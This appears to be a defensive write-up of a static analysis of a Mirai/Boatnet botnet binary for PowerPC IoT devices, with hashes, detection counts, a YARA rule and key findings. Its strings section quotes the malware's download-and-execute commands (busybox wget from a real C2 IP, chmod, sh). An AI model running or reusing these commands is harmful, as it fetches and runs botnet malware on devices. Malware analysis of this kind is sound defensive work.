Overview
This project performs static analysis of a real Mirai botnet ELF binary targeting PowerPC IoT devices (routers, cameras). The sample was obtained from MalwareBazaar and analyzed in an isolated Kali Linux VM with no internet access. The malware was never executed — analysis was performed entirely through static techniques.
Tools Used
file / md5sum / sha256sum
strings
binwalk
YARA
Python + VirusTotal API
Kali Linux (VirtualBox, Host-Only network)
Sample Info
| Property | Value |
| File name | boatnet.ppc.elf |
| File type | ELF 32-bit MSB, PowerPC |
| MD5 | 2a0ebf2aed3edc046104f9fc1309f60e |
| SHA256 | 87d0cb7aea86635fa05c97355d72d48feba4672ded22f44c0d79180357e70fd2 |
| Size | 65.24 KB |
| CVE | CVE-2017-17215 |
| Source | MalwareBazaar (abuse.ch) |
Static Analysis
Static analysis was performed without executing the malware. The file was examined using standard Linux forensic tools to extract indicators of compromise.
Detection
VirusTotal scan returned 42/62 detections. The sample was identified as Trojan.Mirai/DDoS with tags: elf, exploit, spreader, CVE-2017-17215.
Strings Analysis — C2 Server Found
C2 server: 176.65.139.59
/bin/busybox wget http://176.65.139.59
chmod 777 * /tmp/binary
sh 8UsA.sh
Binwalk — Embedded XML Exploit
Binwalk revealed an embedded XML document at offset 0xF6A9. This is a SOAP exploit targeting CVE-2017-17215 (Huawei HomeGateway) built directly into the binary.
YARA Rule
A custom YARA rule Mirai_Boatnet_PPC was written based on strings found during static analysis. The rule successfully detected the sample using 4 of 6 indicators.
Key Findings
| Finding | Detail |
| Family | Mirai/Boatnet botnet |
| Architecture | PowerPC (IoT routers) |
| C2 Server | 176.65.139.59 |
| CVE | CVE-2017-17215 |
| VT Detections | 42/62 |
| Behaviour | Self-propagating spreader |
GitHub
Full writeup, YARA rule and Python script available on GitHub: